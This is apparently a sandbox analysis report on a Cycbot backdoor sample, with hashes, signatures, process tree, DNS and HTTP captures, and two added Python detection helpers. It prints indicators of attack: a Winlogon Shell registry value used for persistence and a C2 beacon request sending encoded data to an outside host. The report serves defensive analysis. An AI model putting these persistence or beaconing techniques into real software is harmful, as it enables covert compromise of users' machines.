Analysis

max time kernel: 148s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27/01/2025, 14:06 UTC
Static task: static1
Behavioral task: behavioral1
Sample: JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe
Resource: win7-20240903-en

Note: the task list shows behavioral1 on the Windows 7 image, but every memory dump and signature below is labelled behavioral2 and the analysis header names the Windows 10 2004 image (win10v2004-20241007-en). The results on this page are from the Windows 10 run; the Windows 7 run is not shown.
General

Target: JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe
Size: 165KB
MD5: 4050f3601ab7931a0f6db2262ecb25a9
SHA1: aea77ad2a71dea57b06d824ab8617149e2d1edcc
SHA256: cd705b00962c246a2513eebce6e3c6b50aed5b3576569006d362a3f16e5b10ea
SHA512: 1d1ce6495680eb604873297f515f163e9c9145451552158bd897968eab3094e3b8b8ea46e974a15b28b11e9f82a7f64f8569d2c0720d00f30f5a69e140fe2507
SSDEEP: 3072:hMMbRiYder+FnuJ2PaCZwXPlbPXHVO2oBvQ6xNDCnz1dShLeA184Uum9xVp:hzb0Yd+3Ehih1PoBI6HDw11A184UTxV
Malware Config
Signatures
Cycbot family

Detects Cycbot payload (7 IoCs)
Cycbot is a backdoor and trojan written in C++.

resource                                                                      yara_rule
behavioral2/memory/1644-19-0x0000000000400000-0x0000000000491000-memory.dmp   family_cycbot
behavioral2/memory/4468-21-0x0000000000400000-0x000000000048E000-memory.dmp   family_cycbot
behavioral2/memory/4468-22-0x0000000000400000-0x0000000000491000-memory.dmp   family_cycbot
behavioral2/memory/2224-121-0x0000000000400000-0x0000000000491000-memory.dmp  family_cycbot
behavioral2/memory/2224-124-0x0000000000400000-0x0000000000491000-memory.dmp  family_cycbot
behavioral2/memory/4468-125-0x0000000000400000-0x0000000000491000-memory.dmp  family_cycbot
behavioral2/memory/4468-307-0x0000000000400000-0x0000000000491000-memory.dmp  family_cycbot
Modifies WinLogon for persistence (2 TTPs, 1 IoC)

description   Set value (str)
ioc           \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\99E4D\\97B0B.exe"
process       JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe

Winlogon treats the Shell value as a comma-separated list, so this write keeps explorer.exe as the desktop shell and additionally launches C:\Users\Admin\AppData\Roaming\99E4D\97B0B.exe at every logon of that user. It is a per-user (HKCU) write, so no elevation is needed; restoring the value to "explorer.exe" removes the persistence. This page records no file-write event for 97B0B.exe itself.
YARA rule "upx" matched in memory (10 IoCs)

resource                                                                      yara_rule
behavioral2/memory/4468-4-0x0000000000400000-0x0000000000491000-memory.dmp    upx
behavioral2/memory/1644-17-0x0000000000400000-0x0000000000491000-memory.dmp   upx
behavioral2/memory/1644-16-0x0000000000400000-0x0000000000491000-memory.dmp   upx
behavioral2/memory/1644-19-0x0000000000400000-0x0000000000491000-memory.dmp   upx
behavioral2/memory/4468-21-0x0000000000400000-0x000000000048E000-memory.dmp   upx
behavioral2/memory/4468-22-0x0000000000400000-0x0000000000491000-memory.dmp   upx
behavioral2/memory/2224-121-0x0000000000400000-0x0000000000491000-memory.dmp  upx
behavioral2/memory/2224-124-0x0000000000400000-0x0000000000491000-memory.dmp  upx
behavioral2/memory/4468-125-0x0000000000400000-0x0000000000491000-memory.dmp  upx
behavioral2/memory/4468-307-0x0000000000400000-0x0000000000491000-memory.dmp  upx
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempts to gather information about the system language of the victim host in order to infer its geographical location.

description   ioc                                                            process
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe
Suspicious use of WriteProcessMemory (6 IoCs)

pid    wrote to   process                                               procid_target
4468   1644       JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe   85
4468   1644       JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe   85
4468   1644       JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe   85
4468   2224       JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe   87
4468   2224       JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe   87
4468   2224       JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe   87
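A check for the Winlogon persistence recorded above, added here as an example (it is not tria.ge code). It parses registry "Set value" events in the format this report uses, splits the Winlogon Shell value on commas and reports every entry beyond the Windows default. It goes slightly beyond the page by treating the Userinit value the same way, since it is hijacked with the same comma-append trick. The first sample event is the IoC from this report; the other two are constructed.

```python
"""Flag Winlogon Shell/Userinit persistence in sandbox registry "Set value" events.

Added example for this report, not tria.ge code. SAMPLE_EVENTS[0] is the IoC
from the report; the other two lines are constructed.
"""
import re
from typing import NamedTuple

# Windows defaults for the two Winlogon values commonly hijacked by appending
# an extra executable after a comma (Shell is what this sample modified).
EXPECTED = {
    "shell": {"explorer.exe"},
    "userinit": {r"c:\windows\system32\userinit.exe", "userinit.exe"},
}

# Event format as shown in the report's Signatures section:
#   Set value (str) \REGISTRY\...\Winlogon\Shell = "<data>" <process>
EVENT_RE = re.compile(
    r'Set value \((?P<type>\w+)\) '
    r'(?P<key>\\REGISTRY\\.*?\\Winlogon)\\(?P<name>Shell|Userinit) = '
    r'"(?P<data>[^"]*)"(?:\s+(?P<proc>\S+))?\s*$',
    re.IGNORECASE,
)


class Finding(NamedTuple):
    key: str
    name: str
    extra: tuple    # entries beyond the Windows default
    process: str


def unexpected_entries(name: str, data: str) -> list:
    """Split a Shell/Userinit value on commas; return entries that are not the default."""
    data = data.replace("\\\\", "\\")   # the sandbox doubles backslashes in string data
    entries = [e.strip() for e in data.split(",") if e.strip()]
    return [e for e in entries if e.lower() not in EXPECTED[name.lower()]]


def scan_events(lines) -> list:
    """Return one Finding per Winlogon Shell/Userinit write that adds a non-default entry."""
    findings = []
    for line in lines:
        m = EVENT_RE.search(line)
        if not m:
            continue
        extra = unexpected_entries(m["name"], m["data"])
        if extra:
            findings.append(Finding(m["key"], m["name"], tuple(extra), m["proc"] or ""))
    return findings


# Sample input: line 1 is the IoC from the report, lines 2-3 are constructed.
SAMPLE_EVENTS = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\99E4D\\97B0B.exe" JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe" setup.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\ProgramData\\svc.exe" dropper.exe',
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.name} hijacked by {f.process}: {', '.join(f.extra)}")
```

On a live host the same comparison can be run against the HKCU and HKLM Winlogon keys directly; the point of the comma split is that a value that still starts with explorer.exe is not clean.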
Processes

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe  (depth 1, PID 4468)
  command line: "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe"
  - Modifies WinLogon for persistence
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe  (depth 2, PID 1644)
    command line: C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe startC:\Program Files (x86)\LP\0B09\619.exe%C:\Program Files (x86)\LP\0B09
    - System Location Discovery: System Language Discovery

  C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe  (depth 2, PID 2224)
    command line: C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe startC:\Program Files (x86)\4DB0B\lvvm.exe%C:\Program Files (x86)\4DB0B
    - System Location Discovery: System Language Discovery

Both children are the same image relaunched by PID 4468 with a "start<path>%<directory>" argument, and PID 4468 is the process that wrote into their memory (the WriteProcessMemory IoCs name 1644 and 2224 as targets). The paths under C:\Program Files (x86)\ appear only as arguments; this page records no file-write events for them.
Network

DNS (all queries sent to 8.8.8.8:53)

PTR  13.86.106.20.in-addr.arpa    -> no answer recorded
PTR  5.114.82.104.in-addr.arpa    -> a104-82-114-5.deploy.static.akamaitechnologies.com
A    cdn.adventofdeception.com    -> 199.59.243.228
A    cdn.adventofdeception.com    -> no response recorded
HTTP request by JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe to 199.59.243.228:80
GET http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png?sv=836&tq=gwY92w4AC8zK9vspFnOiAGI346Z8AYTMbve6ZWBKDIdi5y67aJGckhbJc8B4xg0EcsnlKrIg9qG7wHR06Lhy0558entp%2FNiYMcVgLReK4J2%2BoX48sUkN42p4Fkk4zJkuzowUkvLy8O2UqJ375MZT4A0lYbuOV8CwZ3AndtV%2BRhNj%2BGWZpdHt79grgzURtNEEFyOC91GY%2BpDVr2e%2BEs2DLY4ylVdrClzUAAhONslnMOhR7AWTS

Request
GET /wp-content/uploads/2011/06/frame7.png?sv=836&tq=gwY92w4AC8zK9vspFnOiAGI346Z8AYTMbve6ZWBKDIdi5y67aJGckhbJc8B4xg0EcsnlKrIg9qG7wHR06Lhy0558entp%2FNiYMcVgLReK4J2%2BoX48sUkN42p4Fkk4zJkuzowUkvLy8O2UqJ375MZT4A0lYbuOV8CwZ3AndtV%2BRhNj%2BGWZpdHt79grgzURtNEEFyOC91GY%2BpDVr2e%2BEs2DLY4ylVdrClzUAAhONslnMOhR7AWTS HTTP/1.0
Connection: close
Host: cdn.adventofdeception.com
Accept: */*
User-Agent: chrome/9.0

Response
HTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1846
x-request-id: ebf9f105-494b-4893-a1f3-7db484ddee35
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YWpjTSAAeoqL69UUoZXB34tec2j79fzTVH/IEQ2dS2liae+pMC/nT194c2DggZH1Gchk30FA8c7q4p1r3+VLgg==
set-cookie: parking_session=ebf9f105-494b-4893-a1f3-7db484ddee35; expires=Tue, 28 Jan 2025 03:44:35 GMT; path=/
connection: close

Note: the request is an HTTP/1.0 beacon with a User-Agent ("chrome/9.0") that matches no real browser and a long opaque tq= parameter. The reply is 1846 bytes of text/html carrying a parking_session cookie and an x-adblock-key header, i.e. a domain-parking page rather than the requested PNG: at analysis time cdn.adventofdeception.com was parked and no payload was delivered.
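A triage helper for exchanges like the one above, added here as an example (not tria.ge code): it reads a captured request/response head and decides whether the contacted server was a live C2, a parked domain, or merely throttling the sandbox. REPORT_REQUEST/REPORT_RESPONSE and GOOGLE_REQUEST/GOOGLE_RESPONSE are copied from this report (heads only, bodies were not captured); LIVE_RESPONSE is constructed to show the live branch, which goes beyond what the page itself observed.

```python
"""Classify a sandbox HTTP exchange as parked, rate-limited, live or inconclusive.

Added example for this report, not tria.ge code. The REPORT_* and GOOGLE_*
strings are copied from the report; LIVE_RESPONSE is constructed.
"""
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Markers set by domain-parking services; both appear on the captured response.
PARKING_COOKIE = "parking_session"
PARKING_HEADER = "x-adblock-key"
# Content type a client would expect for the requested file extension.
EXPECTED_TYPES = {"png": "image/png", "gif": "image/gif", "jpg": "image/jpeg"}


@dataclass
class Verdict:
    verdict: str                      # "parked", "rate-limited", "live" or "inconclusive"
    reasons: list = field(default_factory=list)


def parse_message(raw: str):
    """Split an HTTP head into (start line, {lower-cased header name: value})."""
    lines = [line.rstrip("\r") for line in raw.strip().splitlines()]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers


def classify(request_raw: str, response_raw: str) -> Verdict:
    """Decide whether the server behind a beacon looks parked, rate-limited or live."""
    req_line, req = parse_message(request_raw)
    resp_line, resp = parse_message(response_raw)
    _method, target, version = req_line.split()
    status = int(resp_line.split()[1])
    v = Verdict("inconclusive")

    # Client fingerprint: browsers speak HTTP/1.1 and send a Mozilla/ User-Agent.
    if version == "HTTP/1.0":
        v.reasons.append("HTTP/1.0 request, hand-rolled client rather than a browser")
    ua = req.get("user-agent", "")
    if ua and not ua.startswith("Mozilla/"):
        v.reasons.append(f"non-browser User-Agent {ua!r}")

    # Server side: compare what came back with what the URL claims to be.
    ext = urlsplit(target).path.rsplit(".", 1)[-1].lower()
    ctype = resp.get("content-type", "").split(";")[0].strip().lower()
    expected = EXPECTED_TYPES.get(ext)
    parked = PARKING_HEADER in resp or PARKING_COOKIE in resp.get("set-cookie", "")

    if status == 429:
        v.verdict = "rate-limited"
        v.reasons.append("429 Too Many Requests: the server throttled the sandbox, not malware behaviour")
    elif parked:
        v.verdict = "parked"
        v.reasons.append("domain-parking markers in response (parking_session cookie, x-adblock-key header)")
    elif status == 200 and expected and ctype == expected:
        v.verdict = "live"
        v.reasons.append(f"200 with matching content-type {ctype}; payload delivery possible")
    if expected and ctype and ctype != expected:
        v.reasons.append(f"requested .{ext} but received {ctype}")
    return v


# Copied from the report: the Cycbot beacon and the parking-page reply.
REPORT_REQUEST = """GET /wp-content/uploads/2011/06/frame7.png?sv=836&tq=gwY92w4AC8zK9vspFnOiAGI346Z8AYTMbve6ZWBKDIdi5y67aJGckhbJc8B4xg0EcsnlKrIg9qG7wHR06Lhy0558entp%2FNiYMcVgLReK4J2%2BoX48sUkN42p4Fkk4zJkuzowUkvLy8O2UqJ375MZT4A0lYbuOV8CwZ3AndtV%2BRhNj%2BGWZpdHt79grgzURtNEEFyOC91GY%2BpDVr2e%2BEs2DLY4ylVdrClzUAAhONslnMOhR7AWTS HTTP/1.0
Connection: close
Host: cdn.adventofdeception.com
Accept: */*
User-Agent: chrome/9.0
"""
REPORT_RESPONSE = """HTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1846
x-request-id: ebf9f105-494b-4893-a1f3-7db484ddee35
cache-control: no-store, max-age=0
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YWpjTSAAeoqL69UUoZXB34tec2j79fzTVH/IEQ2dS2liae+pMC/nT194c2DggZH1Gchk30FA8c7q4p1r3+VLgg==
set-cookie: parking_session=ebf9f105-494b-4893-a1f3-7db484ddee35; expires=Tue, 28 Jan 2025 03:44:35 GMT; path=/
connection: close
"""
# Copied from the report: the Google /sorry/ exchange that ended in 429.
GOOGLE_REQUEST = """GET /sorry/index?continue=http://www.google.com/&q=EgS117BTGNue4bwGIjB8v_vHyGWPf7zfOXQ588wtkyHgLKBTIpa6hrmPWLhbirCqquBEjHUqLePof8gSk-EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
"""
GOOGLE_RESPONSE = """HTTP/1.1 429 Too Many Requests
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Content-Length: 3086
"""
# Constructed: what a live server answering the same beacon with a real image would look like.
LIVE_RESPONSE = """HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 4096
Connection: close
"""

if __name__ == "__main__":
    for name, pair in {"cycbot": (REPORT_REQUEST, REPORT_RESPONSE),
                       "google": (GOOGLE_REQUEST, GOOGLE_RESPONSE)}.items():
        print(name, classify(*pair))
```

The "live" branch is deliberately weak evidence: a matching content-type only says the server answered in kind, not that the body was benign, so that verdict still needs the body inspected.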
DNS (all queries sent to 8.8.8.8:53)

PTR  228.243.59.199.in-addr.arpa   -> no answer recorded
A    tulfb-uqu4.kupinosis.com      -> no answer recorded
A    m4cid.enotusfed.com           -> no answer recorded
PTR  232.168.11.51.in-addr.arpa    -> no answer recorded
PTR  197.87.175.4.in-addr.arpa     -> no answer recorded
PTR  18.31.95.13.in-addr.arpa      -> no answer recorded
A    26duwoge.enotusfed.com        -> no answer recorded
PTR  70.252.19.2.in-addr.arpa      -> a2-19-252-70.deploy.static.akamaitechnologies.com
PTR  172.214.232.199.in-addr.arpa  -> no answer recorded
A    www.google.com                -> 142.250.179.100

Note: besides the parked cdn.adventofdeception.com, the sample looked up tulfb-uqu4.kupinosis.com, m4cid.enotusfed.com and 26duwoge.enotusfed.com; none returned an address during the run, so they produced no traffic beyond the lookups, but they are the other contact points worth blocking.
HTTP request to 142.250.179.100:80

Request
GET / HTTP/1.0
Connection: close
Host: www.google.com
Accept: */*

Response
HTTP/1.0 302 Found
x-hallmonitor-challenge: CgsI257hvAYQhczZCBIEtdewUw
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Lal2yo3GNGejTsEapyMaBA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Tue, 28 Jan 2025 03:30:35 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-Xhud_y5rSZvutenCr1SY4OsPM2zMKv6i-XykBz8giAVxYYNZsbzA; expires=Sun, 27-Jul-2025 03:30:35 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
-
HTTP request to 142.250.179.100:80

Request
GET / HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com

Response
HTTP/1.1 302 Found
x-hallmonitor-challenge: CgwI257hvAYQ9-KXyQESBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-O0UhZ4_-IhUpBcmJ1UsgDg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Tue, 28 Jan 2025 03:30:35 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-VOcp4kKll_criLPKb5xBmHANztG7k7fzLisNnJP_ixsGfgsysJl74; expires=Sun, 27-Jul-2025 03:30:35 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Connection: close
-
HTTP request by JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe to 142.250.179.100:80
GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGNue4bwGIjB8v_vHyGWPf7zfOXQ588wtkyHgLKBTIpa6hrmPWLhbirCqquBEjHUqLePof8gSk-EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

Request
GET /sorry/index?continue=http://www.google.com/&q=EgS117BTGNue4bwGIjB8v_vHyGWPf7zfOXQ588wtkyHgLKBTIpa6hrmPWLhbirCqquBEjHUqLePof8gSk-EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com

Response
HTTP/1.1 429 Too Many Requests
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3086
X-XSS-Protection: 0
Connection: close
Note: the three requests to www.google.com (two GET / answered with a 302 to /sorry/index, then the /sorry/ URL answered 429) look like a reachability check rather than C2 traffic; the 429 is Google throttling the sandbox's egress address, not sample behaviour.

DNS (all queries sent to 8.8.8.8:53)

PTR  100.179.250.142.in-addr.arpa  -> par21s20-in-f4.1e100.net
PTR  19.229.111.52.in-addr.arpa    -> no answer recorded
PTR  170.253.116.51.in-addr.arpa   -> no answer recorded
Traffic summary

HTTP connections (bytes sent / received, packets sent / received)

199.59.243.228:80  http  JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe  730 B / 2.8kB  7 / 7
  GET http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png?sv=836&tq=gwY92w4AC8zK9vspFnOiAGI346Z8AYTMbve6ZWBKDIdi5y67aJGckhbJc8B4xg0EcsnlKrIg9qG7wHR06Lhy0558entp%2FNiYMcVgLReK4J2%2BoX48sUkN42p4Fkk4zJkuzowUkvLy8O2UqJ375MZT4A0lYbuOV8CwZ3AndtV%2BRhNj%2BGWZpdHt79grgzURtNEEFyOC91GY%2BpDVr2e%2BEs2DLY4ylVdrClzUAAhONslnMOhR7AWTS  -> 200

(remote address not shown in page)  302 B / 1.5kB  5 / 5
  GET http://www.google.com/  -> 302

(remote address not shown in page)  307 B / 1.5kB  5 / 5
  GET http://www.google.com/  -> 302

142.250.179.100:80  http  JaffaCakes118_4050f3601ab7931a0f6db2262ecb25a9.exe  526 B / 3.7kB  6 / 7
  GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGNue4bwGIjB8v_vHyGWPf7zfOXQ588wtkyHgLKBTIpa6hrmPWLhbirCqquBEjHUqLePof8gSk-EyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM  -> 429

DNS (bytes sent / received, requests / responses)

71 B / 157 B    1 / 1   13.86.106.20.in-addr.arpa
71 B / 135 B    1 / 1   5.114.82.104.in-addr.arpa
142 B / 87 B    2 / 1   cdn.adventofdeception.com (queried twice)  -> 199.59.243.228
168 B / -       3 / -   (name not shown in page)
73 B / 131 B    1 / 1   228.243.59.199.in-addr.arpa
70 B / 143 B    1 / 1   tulfb-uqu4.kupinosis.com
65 B / 138 B    1 / 1   m4cid.enotusfed.com
72 B / 158 B    1 / 1   232.168.11.51.in-addr.arpa
71 B / 157 B    1 / 1   197.87.175.4.in-addr.arpa
70 B / 144 B    1 / 1   18.31.95.13.in-addr.arpa
68 B / 141 B    1 / 1   26duwoge.enotusfed.com
70 B / 133 B    1 / 1   70.252.19.2.in-addr.arpa
74 B / 128 B    1 / 1   172.214.232.199.in-addr.arpa
60 B / 76 B     1 / 1   www.google.com  -> 142.250.179.100
74 B / 112 B    1 / 1   100.179.250.142.in-addr.arpa
72 B / 158 B    1 / 1   19.229.111.52.in-addr.arpa
73 B / 159 B    1 / 1   170.253.116.51.in-addr.arpa
MITRE ATT&CK Enterprise v15
Downloads

Three files were captured during the run. The page gives only sizes and hashes, not their names or paths.

File 1
  Filesize: 996B
  MD5: 2674d1714a952a910bdcda1a3aec0e8b
  SHA1: 6d2f7b01aaf72b65cbd81e70bf09c2e65ee88af3
  SHA256: ecb54c8b06958c9134d35fd89b82f112bd1bc5a1683c267cc296877da7f6afe9
  SHA512: 669751e93700740bfb14f6686f02521196e68c1677df2e659fda8b2f1c0bab843509a6ed533c93ec666d5e99ab01726086907d4156865db4fc408bc70a6eb868

File 2
  Filesize: 600B
  MD5: 129bcfedcb2c684691f97574d0544335
  SHA1: bc93427ae5f85b4b5f75cd617ccc427a9db64abe
  SHA256: e5046c029873478748a69efcfef06e4a391c66a3206717c4911780028d93a304
  SHA512: 039079080463846fcb08f1681e9c527c0e338d6d312dfa0b907ce40414802c855bedbd657f8e6e1f3174a3e5a3d3aeece81eb535496c7c75e317296480499186

File 3
  Filesize: 1KB
  MD5: f294e79f1544ac1efaa68fe00cbbecb4
  SHA1: 5fc41f4a7835321399da90075f51378a35b2e478
  SHA256: 9414793d74da7d4a2951f0691ea7a29dd398102c97672121f6dee03e6fedacf4
  SHA512: ad89c744e2d9112fb7aa649de6697bdc072d8b1706755e6773de2b06620266eaa910ce7072c65e1fa8f3b09ae1a8b09439e80a8bd7fecaa28d83e89432696e74